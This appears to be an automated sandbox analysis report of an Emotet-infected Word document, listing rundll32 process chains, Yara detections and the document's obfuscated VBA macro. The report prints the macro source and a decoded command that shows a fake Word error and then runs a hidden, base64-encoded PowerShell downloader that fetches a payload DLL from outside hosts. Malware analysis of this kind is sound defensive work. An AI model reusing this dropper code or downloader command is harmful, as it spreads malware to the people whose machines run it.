Analysis Process: rundll32.exe PID: 2948 Parent PID: 2976

General

Start time:	16:33:46
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zqkhe\wtjq.kha',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2101676455.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2720 Parent PID: 2948

General

Start time:	16:33:47
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rimdqgeexmnm\pcwmnbkufem.jtj',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2103601856.0000000000130000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 852 Parent PID: 2720

General

Start time:	16:33:48
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xoteg\llch.amx',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2107348022.0000000000691000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2107314831.0000000000670000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 600 Parent PID: 852

General

Start time:	16:33:49
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vaxphioewmusne\ukdxjhhssdymm.ubj',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2109173183.0000000000240000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2109198053.0000000000261000.00000020.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 1192 Parent PID: 600

General

Start time:	16:33:50
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Widpnptibmnvlc\vizfdwjpjtiec.yqj',Control_RunDLL
Imagebase:	0xee0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2337393859.0000000000301000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2337362227.0000000000190000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Ifll4vsaspsrsln6_

Declaration

Line	Content
1	Attribute VB_Name = "Ifll4vsaspsrsln6_"

Executed Functions

Function Z9zoxbjstfyh_817c, APIs: 107, Strings: 29, Number of lines: 158, Relevance: 248.658

APIs	Meta Information
Item
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: LOF
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: intGend
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: LOF
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: intGend
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: LOF
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: intGend
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: LOF
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: intGend
FreeFile
Open
Open
LOF
intGend
CreateObject	CreateObject("winmgmts:win32_process")
FreeFile
Open
Open
LOF
intGend
Mid
Len	Len("\x01 ]b2[s]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[s/]b2[sc]b2[s ]b2[sm]b2[ss]b2[sg]b2[s ]b2[s%]b2[su]b2[ss]b2[se]b2[sr]b2[sn]b2[sa]b2[sm]b2[se]b2[s%]b2[s ]b2[s/]b2[sv]b2[s ]b2[sW]b2[so]b2[sr]b2[sd]b2[s ]b2[se]b2[sx]b2[sp]b2[se]b2[sr]b2[si]b2[se]b2[sn]b2[sc]b2[se]b2[sd]b2[s ]b2[sa]b2[sn]b2[s ]b2[se]b2[sr]b2[sr]b2[so]b2[sr]b2[s ]b2[st]b2[sr]b2[sy]b2[si]b2[sn]b2[sg]b2[s ]b2[st]b2[so]b2[s ]b2[so]b2[sp]b2[se]b2[sn]b2[s ]b2[st]b2[sh]b2[se]b2[s ]b2[sf]b2[si]b2[sl]b2[se]b2[s.]b2[s ]b2[s&]b2[s ]b2[s ]b2[sP]b2[s^]b2[sO]b2[sw]b2[s^]b2[se]b2[sr]b2[s^]b2[ss]b2[sh]b2[se]b2[s^]b2[sL]b2[s^]b2[sL]b2[s ]b2[s-]b2[sw]b2[s ]b2[sh]b2[si]b2[sd]b2[sd]b2[se]b2[sn]b2[s ]b2[s-]b2[sE]b2[sN]b2[sC]b2[sO]b2[sD]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s IAA]b2[sgAH]b2[sMAZ]b2[sQB0]b2[sAC0]b2[sASQ]b2[sB0A]b2[sGUA]b2[sbQA]b2[sgAH]b2[sYAY]b2[sQBS]b2[sAGk]b2[sAYQ]b2[sBCA]b2[sEwA]b2[sRQA]b2[s6AD]b2[sMAd]b2[sgBD]b2[sACA]b2[sAIA]b2[sAoA]b2[sFsA]b2[sVAB]b2[s5AH]b2[sAAR]b2[sQBd]b2[sACg]b2[sAIg]b2[sB7A]b2[sDUA]b2[sfQB]b2[s7AD]b2[sAAf]b2[sQB7]b2[sADE]b2[sAfQ]b2[sB7A]b2[sDMA]b2[sfQB]b2[s7AD]b2[sIAf]b2[sQB7]b2[sADQ]b2[sAfQ]b2[sAiA]b2[sCAA]b2[sLQB]b2[sGAC]b2[scAW]b2[sQBT]b2[sAHQ]b2[sAJw]b2[sAsA]b2[sCcA]b2[sRQB]b2[stAC]b2[s4AS]b2[sQBv]b2[sACc]b2[sALA]b2[sAnA]b2[sEkA]b2[sUgB]b2[sFAG]b2[sMAV]b2[sABP]b2[sACc]b2[sALA]b2[sAnA]b2[sC4A]b2[sZAA]b2[snAC]b2[swAJ]b2[swBS]b2[sAHk]b2[sAJw]b2[sAsA]b2[sCcA]b2[sUwA]b2[snAC]b2[skAI]b2[sAAg]b2[sACk]b2[sAOw]b2[sAgA]b2[sCAA]b2[sIAB]b2[sTAG]b2[sUAV]b2[sAAt]b2[sAEk]b2[sAVA]b2[sBFA]b2[sG0A]b2[sIAA]b2[sgAF]b2[sYAY]b2[sQBS]b2[sAGk]b2[sAQQ]b2[sBCA]b2[sGwA]b2[sRQA]b2[s6AD]b2[sUAN]b2[sAA5]b2[sAGM]b2[sAIA]b2[sAgA]b2[sCgA]b2[sIAA]b2[sgAF]b2[ssAd]b2[sABZ]b2[sAHA]b2[sAZQ]b2[sBdA]b2[sCgA]b2[sIgB]b2[s7AD]b2[sQAf]b2[sQB7]b2[sADE]b2[sAfQ]b2[sB7A]b2[sDAA]b2[sfQB]b2[s7AD]b2[sIAf]b2[sQB7]b2[sADM]b2[sAfQ]b2[sAiA]b2[sCAA]b2[sLQB]b2[sGAC]b2[sAAJ]b2[swAu]b2[sACc]b2[sALA]b2[sAnA]b2[sHkA]b2[scwB]b2[s0AE]b2[sUAb]b2[sQAn]b2[sACw]b2[sAJw]b2[sBOA]b2[sEUA]b2[sVAA]b2[suAF]b2[sMAR]b2[sQBy]b2[sAHY]b2[sAaQ]b2[sBjA]b2[sGUA]b2[sUAB]b2[sPAG]b2[skAb]b2[sgAn]b2[sACw]b2[sAJw]b2[sBUA]b2[sG0A]b2[sQQB]b2[suAE]b2[sEAZ]b2[swBF]b2[sAFI]b2[sAJw]b2[sAsA]b2[sCcA]b2[sUwA]b2[snAC]b2[skAI]b2[sAAp]b2[sACA]b2[sAOw]b2[sAgA]b2[sCAA]b2[sJAB]b2[sFAH]b2[sIAc]b2[sgBv]b2[sAHI]b2[sAQQ]b2[sBjA]b2[sHQA]b2[saQB]b2[svAG]b2[s4AU]b2[sABy]b2[sAGU]b2[sAZg]b2[sBlA]b2[sHIA]b2[sZQB]b2[suAG]b2[sMAZ]b2[sQAg]b2[sAD0]b2[sAIA]b2[sAoA]b2[sCcA]b2[sUwA]b2[snAC]b2[ssAK]b2[sAAn]b2[sAGk]b2[sAbA]b2[sBlA]b2[sCcA]b2[sKwA]b2[snAG]b2[s4AJ]b2[swAr]b2[sACc]b2[sAdA]b2[sBsA]b2[sHkA]b2[sJwA]b2[spAC]b2[ssAK]b2[sAAn]b2[sAEM]b2[sAbw]b2[sAnA]b2[sCsA]b2[sJwB]b2[suAC]b2[scAK]b2[sQAr]b2[sACg]b2[sAJw]b2[sB0A]b2[sCcA]b2[sKwA]b2[snAG]b2[skAb]b2[sgB1]b2[sACc]b2[sAKQ]b2[sArA]b2[sCcA]b2[sZQA]b2[snAC]b2[skAO]b2[swAk]b2[sAEE]b2[sAOA]b2[sBoA]b2[sDIA]b2[scgB]b2[s6AG]b2[sIAP]b2[sQAk]b2[sAEY]b2[sANg]b2[sBfA]b2[sEEA]b2[sIAA]b2[srAC]b2[sAAW]b2[swBj]b2[sAGg]b2[sAYQ]b2[sByA]b2[sF0A]b2[sKAA]b2[s2AD]b2[sQAK]b2[sQAg]b2[sACs]b2[sAIA]b2[sAkA]b2[sEwA]b2[sOQA]b2[s4AF]b2[sAAO]b2[swAk]b2[sAE0]b2[sAMA]b2[sAwA]b2[sE8A]b2[sPQA]b2[soAC]b2[scAQ]b2[swAn]b2[sACs]b2[sAKA]b2[sAnA]b2[sDgA]b2[sMgA]b2[snAC]b2[ssAJ]b2[swBa]b2[sACc]b2[sAKQ]b2[sApA]b2[sDsA]b2[sIAA]b2[skAD]b2[sMAV]b2[sgBD]b2[sADo]b2[sAOg]b2[sAiA]b2[sGMA]b2[scgB]b2[slAG]b2[sEAY]b2[sABU]b2[sAGA]b2[sARQ]b2[sBgA]b2[sEQA]b2[sYAB]b2[spAF]b2[sIAZ]b2[sQBj]b2[sAFQ]b2[sAbw]b2[sBSA]b2[sHkA]b2[sIgA]b2[soAC]b2[sQAS]b2[sABP]b2[sAE0]b2[sARQ]b2[sAgA]b2[sCsA]b2[sIAA]b2[soAC]b2[sgAK]b2[sAAn]b2[sAFQ]b2[sAeQ]b2[sBWA]b2[sCcA]b2[sKwA]b2[snAF]b2[sgAd]b2[sAAn]b2[sACs]b2[sAJw]b2[sBzA]b2[sF8A]b2[sbgA]b2[snAC]b2[skAK]b2[swAo]b2[sACc]b2[sAbQ]b2[sBmA]b2[sFQA]b2[seQB]b2[sWAF]b2[sAAN]b2[sAAn]b2[sACs]b2[sAJw]b2[sAxA]b2[sCcA]b2[sKQA]b2[srAC]b2[scAO]b2[sAA4]b2[sACc]b2[sAKw]b2[sAoA]b2[sCcA]b2[scQB]b2[srAC]b2[scAK]b2[swAn]b2[sAFQ]b2[sAJw]b2[sApA]b2[sCsA]b2[sJwB]b2[s5AF]b2[sYAJ]b2[swAp]b2[sACA]b2[sALQ]b2[sByA]b2[sEUA]b2[scAB]b2[ssAG]b2[sEAQ]b2[swBF]b2[sACA]b2[sAIA]b2[sAoA]b2[sCcA]b2[sVAA]b2[snAC]b2[ssAJ]b2[swB5]b2[sAFY]b2[sAJw]b2) -> 15492
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
Create	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJwArACcALwAnACsAKAAnAGEAawAnACsAJwAwACcAKQArACcAYwAnACsAJwBoACcAKwAoACcASAAnACsAJwAvAEAAJwArACcAXQBiADIAJwApACsAKAAnAFsAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwB3AHcALgAnACkAKwAnAGcAJwArACgAJwBlACcAKwAnAG8AcwByACcAKQArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYQBxAHEAJwArACcAaAAnACkAKwAoACcAdwAnACsAJwBkAGEAcAAnACkAKwAoACcALwBsACcAKwAnADAALwBAACcAKwAnAF0AYgAyAFsAcwA6ACcAKQArACcALwAvACcAKwAnAGcAZQAnACsAJwBvACcAKwAnAGYAJwArACcAZgAnACsAJwBvAGcAJwArACgAJwBsACcAKwAnAGUAbQB1AHMAaQAnACsAJwBjAC4AJwApACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAoACcAbQBpACcAKwAnAG4ALwAnACkAKwAoACcANwAnACsAJwBDADEAJwApACsAJwAxACcAKwAoACcAbwAnACsAJwBBAEMALwBAACcAKQArACgAJwBdAGIAJwArACcAMgBbAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAdwB3ACcAKwAoACcAdwAnACsAJwAuAGEAYwBoAHUAdABhACcAKwAnAG0AJwArACcAYQBuACcAKQArACcAYQBzACcAKwAoACcAYQAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAGcAJwApACsAJwBhAHIAJwArACcAbQBpACcAKwAnAG4AJwArACcALQAnACsAKAAnAHAAJwArACcAcgBvAC0AZgAnACkAKwAoACcAZQAnACsAJwBpADgAbwAvACcAKQArACgAJwBtAFcAJwArACcALwAnACkAKwA,,) -> 0
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: LOF
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: intGend
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: LOF
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: intGend
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: LOF
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: intGend
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: Open
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: LOF
Part of subcall function Njcpw_phi02f0@Ifll4vsaspsrsln6_: intGend
Ykqhx9otvrqd8hk
K6e5kz9g40vnyyqph
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend

Strings	Decrypted Strings
"F:\PAFYG\mWmxJc\vrNVIZEL.qwRWQ"
"O:\TQdsrqGBm\AbFeNCGGl\ZclnC.IOmblH"
"]b2[sp]b2[s"
"]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
"F:\uTBiHl\uVbXFT\YbwYGKJ.PIcgwCw"
"O:\roUOVDGAi\QQqsN\fndTk.RhhqJ"
"]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
"F:\jiGtVhMWY\HYRMl\sHfYJF.RwMSIa"
"O:\akOoEIaA\bOFYdJcGA\trHdDHG.hGdTbM"
"w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
"F:\dspcUmGA\PMKDFbO\iCTaGACDi.CsLkJA"
"O:\mTLIDFEFC\bGpevAI\mKHebIDW.ZGhQAyrF"
"]b2[ss]b2[s"
"F:\zqXTADCAY\zBSUhACoC\QyjtDIZqF.VuLfJHDC"
"O:\nkxEJGB\DgDXEE\oddtym.UhBlGPJk"
"F:\FjsdhD\AqrMDHJ\RrhsGh.utzPF"
"O:\juvxiJER\okAYJCIY\JGRYR.uKbmHCRyH"
"F:\gqMAa\hIkBCIoDH\plQXC.MztsGVF"
"O:\ntNeiY\DmIxDvJb\rzyKG.zgDFq"
"F:\dNNXEFJ\acmbFAE\woxMJXHDE.TtPXl"
"O:\SmEZL\EulgpIBLC\aXBYFG.JSmAKD"
"F:\jAZCT\DySvBJIFG\hAlfC.fnSKCJJG"
"O:\qSjvl\yUGgtdAWG\oVioFFBy.quDugF"
"F:\hGyrGI\qHGrBJsd\hZWkGjB.TBolF"
"O:\FbzvAFHGg\ZHHZEbi\hGbdjB.VomiwAsk"
"F:\SUBaGhI\zSrEaFB\FspCHJf.SAqAGV"
"O:\ndcDJ\EmuLtI\DzqYCH.rPICspJ"
"F:\OanxNh\dmwfIytAI\zSVYCAEwA.eRhegND"
"O:\GihTHDyJ\xMEpEDFW\QjvPEbIGE.jZthRA"

Line	Instruction	Meta Information
2	Function Z9zoxbjstfyh_817c()
3	On Error Resume Next	executed
4	mKbjhqs = Sjtq5nhmztw.StoryRanges.Item(244 / 244)	Item
5	Goto uNLRGVB
6	Dim wiHJApFp() as Byte
7	Dim RbyyHrjpJ as Integer
8	RbyyHrjpJ = FreeFile	FreeFile
9	Open "F:\PAFYG\mWmxJc\vrNVIZEL.qwRWQ" For Binary Access Read As # RbyyHrjpJ	Open
10	Open "O:\TQdsrqGBm\AbFeNCGGl\ZclnC.IOmblH" For Binary Access Read As # RbyyHrjpJ	Open
11	Redim wiHJApFp(1 To LOF(intGend) - 5)	LOF intGend
12	Get # RbyyHrjpJ, , wiHJApFp
13	Get # RbyyHrjpJ, , wiHJApFp
14	Get # RbyyHrjpJ, , wiHJApFp
15	Close # RbyyHrjpJ
15	uNLRGVB:
17	snahbsd = "]b2[sp]b2[s"
18	R_7umfo9pai6z7f3 = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
19	Goto zboNH
20	Dim oBgib() as Byte
21	Dim JNXMIkJ as Integer
22	JNXMIkJ = FreeFile	FreeFile
23	Open "F:\uTBiHl\uVbXFT\YbwYGKJ.PIcgwCw" For Binary Access Read As # JNXMIkJ	Open
24	Open "O:\roUOVDGAi\QQqsN\fndTk.RhhqJ" For Binary Access Read As # JNXMIkJ	Open
25	Redim oBgib(1 To LOF(intGend) - 5)	LOF intGend
26	Get # JNXMIkJ, , oBgib
27	Get # JNXMIkJ, , oBgib
28	Get # JNXMIkJ, , oBgib
29	Close # JNXMIkJ
29	zboNH:
31	Jl4wo9mfpjo6pj3xt = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
32	Goto ojjQxBE
33	Dim BdzlIFvyB() as Byte
34	Dim pRgPTIRad as Integer
35	pRgPTIRad = FreeFile	FreeFile
36	Open "F:\jiGtVhMWY\HYRMl\sHfYJF.RwMSIa" For Binary Access Read As # pRgPTIRad	Open
37	Open "O:\akOoEIaA\bOFYdJcGA\trHdDHG.hGdTbM" For Binary Access Read As # pRgPTIRad	Open
38	Redim BdzlIFvyB(1 To LOF(intGend) - 5)	LOF intGend
39	Get # pRgPTIRad, , BdzlIFvyB
40	Get # pRgPTIRad, , BdzlIFvyB
41	Get # pRgPTIRad, , BdzlIFvyB
42	Close # pRgPTIRad
42	ojjQxBE:
44	Scck4sogtl85xp = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
45	Goto IHoUEFCF
46	Dim bJVPQIOWp() as Byte
47	Dim UvQBBwrx as Integer
48	UvQBBwrx = FreeFile	FreeFile
49	Open "F:\dspcUmGA\PMKDFbO\iCTaGACDi.CsLkJA" For Binary Access Read As # UvQBBwrx	Open
50	Open "O:\mTLIDFEFC\bGpevAI\mKHebIDW.ZGhQAyrF" For Binary Access Read As # UvQBBwrx	Open
51	Redim bJVPQIOWp(1 To LOF(intGend) - 5)	LOF intGend
52	Get # UvQBBwrx, , bJVPQIOWp
53	Get # UvQBBwrx, , bJVPQIOWp
54	Get # UvQBBwrx, , bJVPQIOWp
55	Close # UvQBBwrx
55	IHoUEFCF:
57	Zl17yx41b82ep = "]b2[ss]b2[s"
58	Goto aPgSXHG
59	Dim hrvxHJQBI() as Byte
60	Dim kBCsI as Integer
61	kBCsI = FreeFile	FreeFile
62	Open "F:\zqXTADCAY\zBSUhACoC\QyjtDIZqF.VuLfJHDC" For Binary Access Read As # kBCsI	Open
63	Open "O:\nkxEJGB\DgDXEE\oddtym.UhBlGPJk" For Binary Access Read As # kBCsI	Open
64	Redim hrvxHJQBI(1 To LOF(intGend) - 5)	LOF intGend
65	Get # kBCsI, , hrvxHJQBI
66	Get # kBCsI, , hrvxHJQBI
67	Get # kBCsI, , hrvxHJQBI
68	Close # kBCsI
68	aPgSXHG:
70	Px1h3ufov74hylz = Scck4sogtl85xp + Zl17yx41b82ep + Jl4wo9mfpjo6pj3xt + snahbsd + R_7umfo9pai6z7f3
71	Goto MowsUK
72	Dim mbAfpsdI() as Byte
73	Dim IgKEcDFq as Integer
74	IgKEcDFq = FreeFile	FreeFile
